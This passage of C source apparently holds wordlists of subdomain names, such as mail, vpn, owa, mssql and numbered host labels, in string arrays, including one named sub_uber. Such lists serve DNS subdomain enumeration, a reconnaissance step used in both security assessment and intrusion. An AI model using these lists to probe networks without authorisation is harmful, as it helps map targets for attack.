"library", "license", "light", "lim-core-1", "lima", "lincoln", "link", "linus", "linux", "linux0", "linux01", "linux02", "linux1", "linux2", "linuxconf", "lion", "lisa", "list", "lista", "listes", "lists", "listserv", "listserver", "lithium", "live", "lj", "lk", "ll", "llb1", "lm", "lms", "ln", "lo", "lo-0", "lo-0-0", "lo-1", "lo-22", "lo-6", "lo0", "lo0-0", "lo1", "lo2", "load", "loadbalancer", "loc-srv", "local", "localhost", "locsrv", "log", "log-server", "log0", "log01", "log02", "log1", "log2", "logfile", "logfiles", "logger", "logging", "loghost", "login", "logon", "logs", "loki", "london", "longbeach", "loop0", "loopback-0", "loopback-1", "loopback0", "loopback1", "lorien", "losangeles", "lotus", "lotusnote", "louisiana", "lp", "lq", "lr", "ls", "lt", "lu", "lucy", "luke", "luna", "lv", "lw", "lx", "lxxxix", "ly", "lync", "lynx", "lyris", "lz", "m", "m-net", "m1", "m10", "m11", "m12", "m13", "m2", "m3", "m4", "m5", "m6", "m7", "m7i", "ma", "mac", "mac1", "mac10", "mac11", "mac2", "mac3", "mac4", "mac5", "mach", "macintosh", "macos", "macosx", "madrid", "maduin", "mag", "maggie", "magic", "mail", "mail-gw", "mail-in", "mail-out", "mail0", "mail01", "mail02", "mail03", "mail04", "mail05", "mail06", "mail07", "mail1", "mail10", "mail11", "mail12", "mail13", "mail14", "mail15", "mail16", "mail17", "mail18", "mail19", "mail2", "mail20", "mail21", "mail22", "mail23", "mail24", "mail25", "mail26", "mail27", "mail28", "mail29", "mail3", "mail30", "mail31", "mail32", "mail33", "mail4", "mail5", "mail6", "mail7", "mail8", "mail9", "maila", "mailb", "mailbox", "mailer", "mailer1", "mailer2", "mailgate", "mailgate1", "mailgate2", "mailgw", "mailgw1", "mailgw2", "mailgw3", "mailhost", "mailhost1", "mailhost2", "mailhub", "mailin", "mailing", "maillist", "maillists", "mailman", "mailout", "mailq", "mailrelay", "mailroom", "mails", "mailserv", "mailserver", "mailsite", "mailsrv", "mailtest", "mailx", "main", "maine", "maint", "mall", "manage", "management", "manager", "mandelbrot", "mandelspawn", "mango", "manufacturing", "map", "mapas", "maple", "maps", "mapserver", "marge", "maria", "mark", "marketing", "marketplace", "mars", "martin", "marvin", "mary", "maryland", "massachusetts", "master", "matrix", "max", "maxwell", "mb", "mbox", "mc", "mci", "md", "mdaemon", "mdm", "mdns", "me", "media", "medusa", "meet", "meeting", "member", "members", "memphis", "mercury", "merkur", "merlin", "messages", "messenger", "meta", "metis", "mf", "mg", "mgmt", "mh", "mi", "miami", "michael", "michigan", "mickey", "microsoft-ds", "midwest", "miembros", "mike", "milwaukee", "minerva", "mini", "minneapolis", "minnesota", "miranda", "mirror", "mirrors", "mis", "mississippi", "missouri", "mj", "mj0", "mj1", "mk", "ml", "mm", "mmcc", "mms", "mn", "mng", "mngt", "mo", "mob", "mobile", "mobileauth", "mobilemail", "modem", "moe", "moira_db", "moira_update", "moira_ureg", "mojito", "mom", "mon", "mon1", "mon2", "monet", "monitor", "monitor01", "monitoring", "monkey", "monster", "montana", "moodle", "moon", "mordor", "moria", "morpheus", "moscow", "mout", "movies", "movil", "moz", "mozart", "mp", "mp3", "mpeg", "mpg", "mpls", "mq", "mr", "mrtd", "mrtg", "ms", "ms-exchange", "ms-sql", "ms1", "ms2", "msexchange", "msnp", "msp", "mssql", "mssql0", "mssql01", "mssql1", "mt", "mta", "mta01", "mta1", "mta10", "mta11", "mta12", "mta13", "mta14", "mta15", "mta16", "mta17", "mta18", "mta19", "mta2", "mta20", "mta21", "mta22", "mta23", "mta24", "mta25", "mta26", "mta27", "mta28", "mta29", "mta3", "mta30", "mta31", "mta32", "mta33", "mta34", "mta35", "mta36", "mta37", "mta38", "mta39", "mta4", "mta40", "mta41", "mta42", "mta43", "mta44", "mta45", "mta46", "mta47", "mta49", "mta5", "mta50", "mta51", "mta53", "mta54", "mta55", "mta57", "mta58", "mta59", "mta6", "mta60", "mta7", "mta79", "mta8", "mta9", "mtp", "mtu", "mu", "multimedia", "munin", "music", "mustang", "mv", "mw", "mx", "mx0", "mx01", "mx02", "mx03", "mx04", "mx05", "mx06", "mx1", "mx10", "mx11", "mx12", "mx13", "mx14", "mx15", "mx16", "mx17", "mx18", "mx19", "mx2", "mx20", "mx21", "mx22", "mx23", "mx24", "mx25", "mx26", "mx27", "mx28", "mx29", "mx3", "mx30", "mx31", "mx32", "mx33", "mx34", "mx35", "mx36", "mx37", "mx38", "mx39", "mx4", "mx40", "mx41", "mx42", "mx43", "mx44", "mx45", "mx46", "mx47", "mx48", "mx49", "mx5", "mx50", "mx51", "mx52", "mx53", "mx54", "mx55", "mx56", "mx57", "mx58", "mx59", "mx6", "mx60", "mx61", "mx62", "mx63", "mx64", "mx65", "mx66", "mx67", "mx68", "mx69", "mx7", "mx70", "mx71", "mx72", "mx73", "mx74", "mx75", "mx76", "mx77", "mx78", "mx79", "mx8", "mx80", "mx81", "mx82", "mx83", "mx84", "mx85", "mx86", "mx87", "mx88", "mx89", "mx9", "mx90", "mx91", "mx92", "mx93", "mx94", "mx95", "mx96", "mx97", "mx98", "mx99", "my", "mymail", "mysql", "mysql0", "mysql01", "mysql1", "mz", "n", "n1", "n2", "na", "nagios", "name", "names", "nameserv", "nameserver", "narf", "nas", "nas1", "nas2", "nashville", "nat", "nat1", "nat2", "nat3", "nb", "nbp", "nc", "nd", "ndn-gw", "nds", "ndtp", "ne", "nebraska", "nebula", "nelson", "nemesis", "nemo", "neo", "neon", "neptun", "neptune", "nessus", "net", "net1", "net2", "net3", "net4", "netapp", "netbios", "netdata", "netflow", "netgear", "netlab", "netmail", "netmeeting", "netmon", "netnews", "netscaler", "netscreen", "netstat", "netstats", "netwall", "network", "network-via-ctc", "nevada", "never", "new", "newhampshire", "newjersey", "newmail", "newmexico", "neworleans", "news", "newsfeed", "newsfeed2", "newsfeeds", "newsgroups", "newsletter", "newton", "newyork", "newzealand", "nextstep", "nexus", "nf", "nfs", "ng", "nh", "ni", "nic", "nigeria", "ninstall", "nj", "nk", "nl", "nm", "nms", "nn", "nntp", "nntps", "no", "no-dns-yet", "noc", "noclog", "node", "node1", "node2", "node3", "node4", "node5", "nokia", "nombres", "nora", "north", "northcarolina", "northdakota", "northeast", "northwest", "notebook", "notes", "noticias", "nova", "novell", "november", "np", "nq", "nqs", "nr", "ns", "ns-", "ns-cache", "ns-ext", "ns0", "ns00", "ns01", "ns02", "ns03", "ns1", "ns10", "ns11", "ns12", "ns15", "ns2", "ns3", "ns4", "ns5", "ns6", "ns7", "ns8", "ns9", "nsa", "nsauth1", "nsca", "nscache", "nscache1", "nscache2", "nss", "nsv6", "nt", "nt4", "nt40", "ntalk", "ntmail", "ntp", "ntp0", "ntp1", "ntp2", "ntp3", "ntserver", "nu", "null", "nut", "nv", "nw", "nx", "ny", "nz", "o", "o1", "o2", "oa", "oak", "oakland", "ob", "obelix", "oberon", "oc", "oc48-pos9-0", "ocean", "ocs", "ocsp", "octopus", "od", "odin", "oe", "of", "office", "office2", "offices", "og", "oh", "ohio", "oi", "oj", "ojp-apply", "ok", "oklahoma", "oklahomacity", "ol", "old", "oldmail", "oleane-gw", "om", "oma", "omaha", "omega", "omicron", "omirr", "omniorb", "on", "one", "online", "ontario", "onyx", "oo", "op", "opac", "opal", "open", "openbsd", "openview", "openvpn", "operations", "ops", "ops0", "ops01", "ops02", "ops1", "ops2", "opsware", "oq", "or", "ora", "oracle", "orange", "oraportal", "order", "orders", "oregon", "origin", "orion", "orlando", "os", "oscar", "osiris", "ospf6d", "ospfapi", "ospfd", "osx", "ot", "otrs", "ou", "out", "outbound", "outbound1", "outbound2", "outgoing", "outlook", "outside", "ov", "ow", "owa", "owa01", "owa02", "owa1", "owa2", "owl", "ows", "ox", "oxnard", "oxygen", "oy", "oz", "p", "p0-0", "p1", "p1-0", "p1-960", "p10", "p11", "p12", "p2", "p3", "p4", "p5", "p6", "p7", "pa", "pa1", "pa2", "pa67", "packages", "page", "pager", "pages", "paginas", "pan", "panda", "pandora", "panel", "panoramix", "panther", "papa", "paris", "parners", "partner", "partners", "pascal", "pat", "patch", "patches", "paul", "pawserv", "payroll", "pb", "pbx", "pc", "pc01", "pc02", "pc03", "pc04", "pc05", "pc06", "pc07", "pc08", "pc09", "pc1", "pc10", "pc101", "pc11", "pc12", "pc13", "pc14", "pc15", "pc16", "pc17", "pc18", "pc19", "pc2", "pc20", "pc21", "pc22", "pc23", "pc24", "pc25", "pc26", "pc27", "pc28", "pc29", "pc3", "pc30", "pc31", "pc32", "pc33", "pc34", "pc35", "pc36", "pc37", "pc38", "pc39", "pc4", "pc40", "pc41", "pc42", "pc43", "pc44", "pc45", "pc46", "pc47", "pc48", "pc49", "pc5", "pc50", "pc51", "pc52", "pc53", "pc54", "pc55", "pc56", "pc57", "pc58", "pc59", "pc6", "pc60", "pc61", "pc62", "pc63", "pc64", "pc65", "pc66", "pc67", "pc68", "pc69", "pc7", "pc70", "pc71", "pc72", "pc73", "pc74", "pc75", "pc76", "pc77", "pc78", "pc79", "pc8", "pc80", "pc81", "pc82", "pc83", "pc84", "pc85", "pc86", "pc87", "pc88", "pc89", "pc9", "pc90", "pc91", "pc92", "pc93", "pc94", "pc95", "pc96", "pc97", "pc98", "pc99", "pcanywhere", "pcmail", "pcrd", "pd", "pda", "pdc", "pe", "peach", "pegasus", "pendrell", "penguin", "pennsylvania", "penti", "people", "peoplesoft", "perseus", "personal", "peter", "pf", "pg", "pgp", "ph", "phantom", "phi", "philadelphia", "phobos", "phoebe", "phoenix", "phoeniz", "phone", "phones", "photo", "photon", "photos", "php", "pi", "picard", "picasso", "pics", "pictures", "pilot", "pine", "pink", "pipex-gw", "pironet", "pittsburgh", "pix", "pj", "pk", "pki", "pl", "plano", "platinum", "plato", "plesk", "plum", "pluto", "pluton", "pm", "pm1", "pm3", "pn", "po", "po-1", "po-2", "po1", "po100", "po2", "poczta", "polaris", "policy", "polls", "pollux", "polycom", "pool", "pop", "pop2", "pop3", "pop3s", "port", "portal", "portal2", "portalipv6", "portals", "portfolio", "portland", "pos1-0", "poseidon", "posix", "post", "posta", "postales", "postaweb", "postgresql", "posti", "postman", "postmaster", "postoffice", "power", "powerschool", "powertech-gw", "pp", "ppp", "ppp001", "ppp002", "ppp003", "ppp01", "ppp02", "ppp03", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp22", "ppp23", "ppp24", "ppp25", "ppp26", "ppp27", "ppp28", "ppp29", "ppp3", "ppp30", "ppp31", "ppp32", "ppp33", "ppp34", "ppp35", "ppp36", "ppp37", "ppp38", "ppp39", "ppp4", "ppp40", "ppp41", "ppp42", "ppp43", "ppp44", "ppp45", "ppp46", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "pq", "pr", "pre-prod", "predict", "prensa", "preprod", "press", "preview", "print", "printer", "printserv", "printserver", "priv", "privacy", "privat", "private", "prj", "pro", "problemtracker", "prod", "production", "products", "profiles", "project", "projects", "prometheus", "promo", "prop", "proteus", "proton", "proxy", "proxy1", "proxy2", "proxy3", "prueba", "pruebas", "ps", "psi", "pss", "pt", "ptr", "pu", "pub", "public", "pubs", "puck", "puma", "puppet", "purple", "pv", "pw", "pwdgen", "px", "py", "pz", "q", "qa", "qb", "qc", "qd", "qe", "qf", "qg", "qh", "qi", "qj", "qk", "ql", "qm", "qmail", "qmtp", "qn", "qo", "qotd", "qp", "qq", "qr", "qs", "qt", "qu", "quake", "quark", "quebec", "queen", "quotes", "qv", "qw", "qx", "qy", "qz", "r", "r00", "r01", "r02", "r1", "r2", "r2d2", "r3", "r7-pao1", "ra", "rabbit", "radio", "radius", "radius1", "radius2", "radon", "rainbow", "rapidsite", "raptor", "ras", "raven", "rb", "rc", "rcs", "rd", "rdns", "rdp", "re", "read", "real", "realserver", "recruiting", "recursive", "red", "redhat", "redirect", "redirect1", "redirect2", "redmine", "ref", "reference", "reg", "register", "registro", "registry", "regs", "relay", "relay01", "relay02", "relay1", "relay2", "relay3", "releases", "rem", "remote", "remote2", "remotefs", "remstats", "report", "reporting", "reports", "res", "res1", "res2", "research", "reseller", "reserved", "resolv1", "resolver", "resolver1", "resolver2", "restricted", "resumenes", "rev", "reverse", "rf", "rfe", "rg", "rh", "rhea", "rho", "rhodeisland", "ri", "rigel", "ripd", "ripe", "ripngd", "ris", "rj", "rje", "rk", "rl", "rlp", "rm", "rmi", "rn", "rnd", "rns2", "ro", "robert", "robin", "robinhood", "rock", "romeo", "romulus", "root", "rootd", "rose", "route", "router", "router-via-ctc", "router1", "router2", "rp", "rplay", "rptp", "rq", "rr", "rr1", "rs", "rs1", "rs2", "rss", "rsync", "rt", "rt1", "rt2", "rtelnet", "rtmp", "rtr", "rtr01", "rtr1", "rtsp", "ru", "ruby", "rune", "rv", "rw", "rwhois", "rx", "ry", "rz", "s", "s0", "s0-0", "s0-1", "s01", "s02", "s1", "s10", "s11", "s12", "s13", "s14", "s15", "s16", "s17", "s18", "s19", "s2", "s20", "s21", "s22", "s23", "s24", "s25", "s26", "s27", "s28", "s29", "s3", "s30", "s31", "s32", "s33", "s34", "s35", "s36", "s37", "s38", "s39", "s4", "s40", "s41", "s42", "s43", "s44", "s45", "s46", "s47", "s48", "s49", "s5", "s50", "s51", "s52", "s53", "s54", "s55", "s56", "s57", "s58", "s59", "s6", "s60", "s61", "s62", "s63", "s64", "s65", "s66", "s67", "s68", "s69", "s7", "s70", "s71", "s72", "s73", "s74", "s75", "s76", "s77", "s78", "s79", "s8", "s80", "s81", "s82", "s83", "s84", "s85", "s86", "s87", "s88", "s89", "s9", "s90", "s91", "s92", "s93", "s94", "s95", "s96", "s97", "s98", "s99", "sa", "sac", "sacramento", "sadmin", "safe", "saft", "sage", "sakura", "sales", "saltlake", "sam", "sample", "samples", "san", "sanantonio", "sandbox", "sandiego", "sane", "sanfrancisco", "sanjose", "sap", "sapgw", "sapphire", "sara", "saskatchewan", "saturn", "sauron", "sb", "sbs", "sc", "scan", "scanner", "scanner01", "schedules", "scotland", "scotty", "sd", "se", "search", "search6", "seattle", "sec", "sec1", "secondary", "secret", "secure", "secure1", "secure2", "secured", "securemail", "securid", "security", "seeweb-gw", "seguro", "send", "sendmail", "sentinel", "sentry", "seri", "serial", "serv", "serv1", "serv2", "server", "server01", "server02", "server03", "server1", "server10", "server11", "server12", "server2", "server3", "server4", "server5", "server6", "server7", "server8", "server9", "servers", "serveur", "service", "services", "services1", "servicio", "servicios", "servidor", "setup", "sf", "sftp", "sg", "sh", "shadow", "shannon", "share", "shared", "sharepoint", "shareware", "shark", "shell", "shell1", "shipping", "shiva", "shop", "shoppers", "shopping", "si", "sidn2", "siebel", "sierra", "sieve", "sigma", "signin", "signup", "silc", "silver", "sim", "simon", "sip", "sip-tls", "sirius", "site", "sites", "six", "sixxs", "sixxs-gw", "sj", "sk", "skkserv", "sky", "skynet", "skywalker", "sl", "slackware", "slmail", "sm", "smail", "smart", "smc", "sml", "smokeping", "sms", "smsqp", "smtp", "smtp-out", "smtp01", "smtp02", "smtp03", "smtp1", "smtp10", "smtp11", "smtp12", "smtp13", "smtp14", "smtp15", "smtp16", "smtp17", "smtp18", "smtp2", "smtp20", "smtp21", "smtp22", "smtp3", "smtp4", "smtp5", "smtp6", "smtp7", "smtp8", "smtp9", "smtphost", "smtpout", "smux", "sn", "snail", "sndv-pts01", "sniffer", "snmp", "snmp-trap", "snmpd", "snoopy", "snort", "snow", "snpp", "so", "so-0-0-0", "so-0-0-1", "so-0-1-0", "so-1-0-0", "so-2-0-0", "soap", "socal", "socios", "socks", "socrates", "software", "sokrates", "sol", "solar", "solaris", "solutions", "sonic", "soporte", "source", "sourcecode", "sourcesafe", "south", "southcarolina", "southdakota", "southeast", "southwest", "sp", "space", "spain", "spam", "spamd", "spamfilter", "spare", "speed", "speedtest", "speedy", "spider", "spiderman", "spike", "spl", "splunk", "spock", "spokane", "spot", "springfield", "sprint", "sq", "sqa", "sql", "sql0", "sql01", "sql1", "sql2", "sql7", "sqlserver", "squid", "squirrel", "squirrelmail", "sr", "src", "srv", "srv01", "srv02", "srv03", "srv1", "srv2", "srv3", "srv4", "srv5", "ss", "ssc", "ssh", "ssl", "ssl-vpn", "ssl0", "ssl01", "ssl1", "sslvpn", "ssmtp", "sso", "st", "staff", "stage", "staging", "stan", "star", "star-gw", "stargate", "start", "stat", "static", "station1", "station2", "station3", "station4", "statistics", "stats", "status", "stg", "stinky", "stlouis", "sto-cr1", "sto-cr2", "sto-cr3", "stock", "storage", "store", "storefront", "storm", "stream", "streaming", "stronghold", "strongmail", "student", "students", "studio", "styx", "su", "sub", "submission", "submit", "subversion", "suche", "sun", "sun0", "sun01", "sun02", "sun1", "sun2", "sunrpc", "supdup", "superman", "supfiledbg", "supfilesrv", "supplier", "suppliers", "support", "sur01", "survey", "surveys", "suucp", "sv", "sv1", "sv2", "svc", "svn", "svr01", "svr02", "svr1", "sw", "sw-core1", "sw0", "sw01", "sw1", "sw2", "sw3", "swat", "sweden", "switch", "switch1", "switch2", "switzerland", "sx", "sy", "sybase", "sydney", "sync", "sys2", "sysadmin", "sysback", "syslog", "syslogs", "sysrqd", "systat", "system", "sz", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "t1", "t2", "t3", "ta", "tacacs", "tacacs-ds", "tacoma", "tail", "taiwan", "talk", "tampa", "tango", "tao", "tarsier", "tau", "taurus", "tb", "tc", "tc1", "tcl", "tcpmux", "td", "te", "te-1-1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "te-3-1", "te2-1", "team", "tech", "technology", "techsupport", "telephone", "telephony", "telnet", "telnets", "temp", "tempo", "ten1-0-0", "tennessee", "teredo", "teredo-gw", "teredo-relay", "term", "terminal", "terminalserver", "termserv", "terra", "terror", "tesla", "test", "test1", "test2", "test2k", "test3", "test4", "test6", "test6www", "testajax", "testasp", "testaspnet", "testbed", "testcf", "testing", "testip6", "testipv6", "testjsp", "testlab", "testlinux", "testphp", "testserver", "testsite", "testsql", "testxp", "tethys", "texas", "tf", "tfido", "tftp", "tg", "tge-1-1", "tge8-1", "tge9-1", "th", "thailand", "the", "theta", "thinktank", "thomas", "thor", "thunder", "ti", "tick", "ticket", "tickets", "tienda", "tiger", "time", "timed", "tinc", "titan", "titania", "titanium", "tivoli", "tj", "tk", "tl", "tm", "tn", "tns", "to", "toad", "tokyo", "toledo", "tom", "tomocha", "tool", "tools", "top", "topaz", "toplayer", "tornado", "toronto", "tour", "tp", "tproxy", "tq", "tr", "trac", "tracker", "tracker0", "traffic", "train", "training", "transfer", "transfers", "traveler", "trinidad", "trinity", "triton", "trn1-iana", "ts", "ts01", "ts1", "ts2", "tsv01", "tt", "tu", "tu-0", "tu0", "tu1", "tu2", "tu3", "tu5", "tucson", "tulsa", "tunnel", "tunnel2", "tunnelbroker", "turing", "turtle", "tux", "tv", "tw", "twcc", "two", "tx", "ty", "tz", "u", "ua", "uat", "ub", "ubuntu", "uc", "ud", "uddi", "ue", "uer01", "uf", "ug", "uh", "uhura", "ui", "uj", "uk", "ul", "ulistserv", "ultracopier", "um", "un", "unassigned", "undernet-gw", "uni", "uniform", "union", "unitedkingdom", "unitedstates", "unix", "unixware", "unknown", "unused", "uo", "up", "up0-dc", "update", "updates", "upload", "uploads", "upp-cr1", "ups", "ups1", "upsilon", "uq", "ur", "ur01", "ur02", "ur03", "ur04", "uranus", "urchin", "us", "us1", "usa", "usenet", "user", "user1", "user10", "user11", "user12", "user13", "user14", "user15", "user16", "user17", "user18", "user19", "user2", "user20", "user21", "user22", "user23", "user24", "user25", "user26", "user27", "user28", "user29", "user3", "user30", "user31", "user32", "user33", "user34", "user35", "user36", "user37", "user38", "user39", "user4", "user40", "user41", "user42", "user43", "user44", "user45", "user46", "user47", "user48", "user49", "user5", "user50", "user51", "user52", "user53", "user54", "user55", "user56", "user57", "user58", "user59", "user6", "user60", "user61", "user62", "user63", "user64", "user65", "user66", "user67", "user68", "user69", "user7", "user70", "user71", "user72", "user73", "user74", "user75", "user76", "user77", "user78", "user79", "user8", "user80", "user81", "user82", "user83", "user84", "user85", "user86", "user87", "user88", "user89", "user9", "user90", "user91", "user92", "user93", "user94", "user95", "user96", "user97", "user98", "user99", "users", "ut", "utah", "utilities", "uu", "uucp", "uucp-path", "uv", "uw", "ux", "uy", "uz", "v", "v1", "v2", "v3", "v6", "v6gw", "v6www", "va", "vaak", "vab-core-1", "vab2-core-1", "vader", "vantive", "vault", "vb", "vboxd", "vc", "vcenter", "vd", "vds", "ve", "ve1", "ve8", "vega", "vegas", "vend", "vendors", "ventas", "venus", "vermont", "vf", "vg", "vh", "vhost", "vi", "victor", "video", "video6", "videos", "view", "viking", "violet", "vip", "viper", "virginia", "virgo", "virtual", "vision", "vista", "vj", "vk", "vl", "vl-6", "vl10", "vl100", "vl101", "vl102", "vl6-at", "vlad", "vlan-100", "vlan1", "vlan100", "vlan101", "vlan2", "vlan3", "vm", "vm0", "vm01", "vm1", "vm2", "vm3", "vm4", "vmail", "vmm", "vmserver", "vmware", "vn", "vnc", "vnetd", "vo", "vod", "voice", "voicemail", "voip", "voip1", "vopied", "vortex", "vox", "voyager", "vp", "vpn", "vpn0", "vpn01", "vpn02", "vpn1", "vpn2", "vpn3", "vpn4", "vps", "vps01", "vps1", "vps2", "vps3", "vq", "vr", "vs", "vs1", "vserv", "vserver", "vt", "vu", "vulcan", "vv", "vw", "vwww01", "vx", "vy", "vz", "w", "w-03", "w-04", "w01", "w1", "w2", "w3", "w4", "wa", "wais", "wall", "wallet", "wam", "wan", "wap", "warehouse", "warlord", "washington", "water", "watson", "wave", "wb", "wbm0", "wbm1", "wc", "wc3", "wd", "we", "weather", "web", "web0", "web01", "web02", "web03", "web04", "web1", "web10", "web11", "web12", "web2", "web3", "web4", "web5", "web6", "web7", "web8", "web9", "webaccess", "webadmin", "webalizer", "webapps", "webapps03", "webboard", "webcache", "webcam", "webcast", "webconf", "webct", "webdev", "webdocs", "webfarm", "webhelp", "webhost", "weblib", "weblog", "weblogic", "webmail", "webmail01", "webmail1", "webmail2", "webmaster", "webmin", "webproxy", "webring", "webs", "webserv", "webserver", "webservice", "webservices", "website", "websites", "websphere", "websrv", "websrvr", "webstats", "webster", "webstore", "websvr", "webtest", "webtest01", "webtrends", "webvpn", "welcome", "west", "westvirginia", "wf", "wg", "wh", "wh1", "whiskey", "white", "who", "whois", "wi", "wichita", "wifi", "wiki", "wililiam", "willow", "win", "win01", "win02", "win1", "win2", "win2000", "win2003", "win2008", "win2k", "win2k3", "win2k8", "wind", "windows", "windows01", "windows02", "windows1", "windows2", "windows2000", "windows2003", "windows2008", "windows7", "windowsvista", "windowsxp", "wingate", "winnt", "winproxy", "wins", "winserve", "winxp", "wire", "wireless", "wisconsin", "wj", "wk", "wl", "wlan", "wlan6", "wm", "wn", "wo", "wolf", "wordpress", "work", "world", "wp", "wpad", "wq", "wr", "write", "ws", "ws01", "ws02", "ws1", "ws10", "ws11", "ws12", "ws13", "ws14", "ws15", "ws16", "ws17", "ws18", "ws19", "ws2", "ws20", "ws21", "ws22", "ws23", "ws24", "ws25", "ws26", "ws27", "ws28", "ws29", "ws3", "ws30", "ws31", "ws32", "ws33", "ws34", "ws35", "ws36", "ws37", "ws38", "ws39", "ws4", "ws40", "ws41", "ws42", "ws43", "ws44", "ws45", "ws46", "ws47", "ws48", "ws49", "ws5", "ws50", "ws51", "ws52", "ws53", "ws54", "ws55", "ws56", "ws57", "ws6", "ws60", "ws7", "ws8", "ws9", "wsus", "wt", "wu", "wusage", "wv", "ww", "ww0", "ww00", "ww01", "ww02", "ww03", "ww1", "ww2", "ww3", "www", "www-", "www-0", "www-00", "www-01", "www-02", "www-03", "www-1", "www-2", "www-3", "www-6", "www-int", "www-ipv6", "www-test", "www-v6", "www-v6v4", "www0", "www00", "www01", "www02", "www03", "www1", "www10", "www11", "www12", "www13", "www14", "www2", "www3", "www4", "www5", "www6", "www6test", "www7", "www8", "www9", "wwwchat", "wwwdev", "wwwipv6", "wwwmail", "wwwtest", "wwwtest6", "wwwv6", "wx", "wy", "wyoming", "wz", "x", "x-ray", "x1", "x11", "xa", "xanthus", "xb", "xc", "xcii", "xd", "xdmcp", "xe", "xe-0-0-0", "xe-0-1-0", "xe-0-2-0", "xe-0-2-0-0", "xe-0-3-0", "xe-1-0-0", "xe-1-1-0", "xe-1-2-0-0", "xe-1-3-0", "xe-2-0-0", "xe-2-1-0", "xe-3-0-0", "xen", "xen1", "xenon", "xerox", "xf", "xg", "xh", "xi", "xj", "xk", "xl", "xlogan", "xm", "xmail", "xml", "xmpp-client", "xmpp-server", "xn", "xo", "xp", "xpilot", "xq", "xr", "xs", "xserve", "xt", "xtel", "xtell", "xu", "xv", "xw", "xx", "xy", "xz", "y", "ya", "yankee", "yb", "yc", "yd", "ye", "yellow", "yf", "yg", "yh", "yi", "yj", "yk", "yl", "ym", "yn", "yo", "yoda", "you", "young", "your", "yp", "yq", "yr", "ys", "yt", "yu", "yv", "yw", "yx", "yy", "yz", "z", "z-log", "z3950", "za", "zabbix", "zaphod", "zb", "zc", "zd", "ze", "zebra", "zebrasrv", "zen", "zera", "zero", "zeta", "zeus", "zf", "zg", "zh", "zi", "zimbra", "zion", "zip", "zixvpm", "zj", "zk", "zl", "zlog", "zm", "zn", "zo", "zope", "zp", "zq", "zr", "zs", "zserv", "zt", "zu", "zulu", "zv", "zw", "zx", "zy", "zz", "" }; char *sub_uber[] = { "0", "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "0a", "0b", "0c", "0d", "0e", "0f", "1", "10", "10gigabitethernet1-2", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1cust1", "1cust10", "1cust11", "1cust12", "1cust13", "1cust14", "1cust15", "1cust16", "1cust17", "1cust18", "1cust19", "1cust2", "1cust20", "1cust21", "1cust22", "1cust23", "1cust24", "1cust25", "1cust26", "1cust27", "1cust28", "1cust29", "1cust3", "1cust30", "1cust31", "1cust32", "1cust33", "1cust34", "1cust35", "1cust36", "1cust37", "1cust38", "1cust39", "1cust4", "1cust40", "1cust41", "1cust42", "1cust43", "1cust44", "1cust45", "1cust46", "1cust47", "1cust48", "1cust49", "1cust5", "1cust50", "1cust51", "1cust52", "1cust53", "1cust54", "1cust55", "1cust56", "1cust57", "1cust58", "1cust59", "1cust6", "1cust60", "1cust61", "1cust62", "1cust63", "1cust64", "1cust65", "1cust66", "1cust67", "1cust68", "1cust69", "1cust7", "1cust70", "1cust71", "1cust72", "1cust73", "1cust74", "1cust75", "1cust76", "1cust77", "1cust78", "1cust79", "1cust8", "1cust80", "1cust81", "1cust82", "1cust83", "1cust84", "1cust85", "1cust86", "1cust87", "1cust88", "1cust89", "1cust9", "1cust90", "1cust91", "1cust92", "1cust93", "1cust94", "1cust95", "1cust96", "1cust97", "1cust98", "1cust99", "1d", "1e", "1f", "1g-bge0", "1g-eth0", "2", "20", "21", "21cust1", "21cust10", "21cust11", "21cust12", "21cust13", "21cust14", "21cust15", "21cust16", "21cust17", "21cust18", "21cust19", "21cust2", "21cust20", "21cust21", "21cust22", "21cust23", "21cust24", "21cust25", "21cust26", "21cust27", "21cust28", "21cust29", "21cust3", "21cust30", "21cust31", "21cust32", "21cust33", "21cust34", "21cust35", "21cust36", "21cust37", "21cust38", "21cust39", "21cust4", "21cust40", "21cust41", "21cust42", "21cust43", "21cust44", "21cust45", "21cust46", "21cust47", "21cust48", "21cust49", "21cust5", "21cust50", "21cust51", "21cust52", "21cust53", "21cust54", "21cust55", "21cust56", "21cust57", "21cust58", "21cust59", "21cust6", "21cust60", "21cust61", "21cust62", "21cust63", "21cust64", "21cust65", "21cust66", "21cust67", "21cust68", "21cust69", "21cust7", "21cust70", "21cust71", "21cust72", "21cust73", "21cust74", "21cust75", "21cust76", "21cust77", "21cust78", "21cust79", "21cust8", "21cust80", "21cust81", "21cust82", "21cust83", "21cust84", "21cust85", "21cust86", "21cust87", "21cust88", "21cust89", "21cust9", "21cust90", "21cust91", "21cust92", "21cust93", "21cust94", "21cust95", "21cust96", "21cust97", "21cust98", "21cust99", "22", "22cust1", "22cust10", "22cust11", "22cust12", "22cust13", "22cust14", "22cust15", "22cust16", "22cust17", "22cust18", "22cust19", "22cust2", "22cust20", "22cust21", "22cust22", "22cust23", "22cust24", "22cust25", "22cust26", "22cust27", "22cust28", "22cust29", "22cust3", "22cust30", "22cust31", "22cust32", "22cust33", "22cust34", "22cust35", "22cust36", "22cust37", "22cust38", "22cust39", "22cust4", "22cust40", "22cust41", "22cust42", "22cust43", "22cust44", "22cust45", "22cust46", "22cust47", "22cust48", "22cust49", "22cust5", "22cust50", "22cust51", "22cust52", "22cust53", "22cust54", "22cust55", "22cust56", "22cust57", "22cust58", "22cust59", "22cust6", "22cust60", "22cust61", "22cust62", "22cust63", "22cust64", "22cust65", "22cust66", "22cust67", "22cust68", "22cust69", "22cust7", "22cust70", "22cust71", "22cust72", "22cust73", "22cust74", "22cust75", "22cust76", "22cust77", "22cust78", "22cust79", "22cust8", "22cust80", "22cust81", "22cust82", "22cust83", "22cust84", "22cust85", "22cust86", "22cust87", "22cust88", "22cust89", "22cust9", "22cust90", "22cust91", "22cust92", "22cust93", "22cust94", "22cust95", "22cust96", "22cust97", "22cust98", "22cust99", "23", "24", "25", "26", "2607", "27", "28", "29", "2a", "2b", "2c", "2cust1", "2cust10", "2cust11", "2cust12", "2cust13", "2cust14", "2cust15", "2cust16", "2cust17", "2cust18", "2cust19", "2cust2", "2cust20", "2cust21", "2cust22", "2cust23", "2cust24", "2cust25", "2cust26", "2cust27", "2cust28", 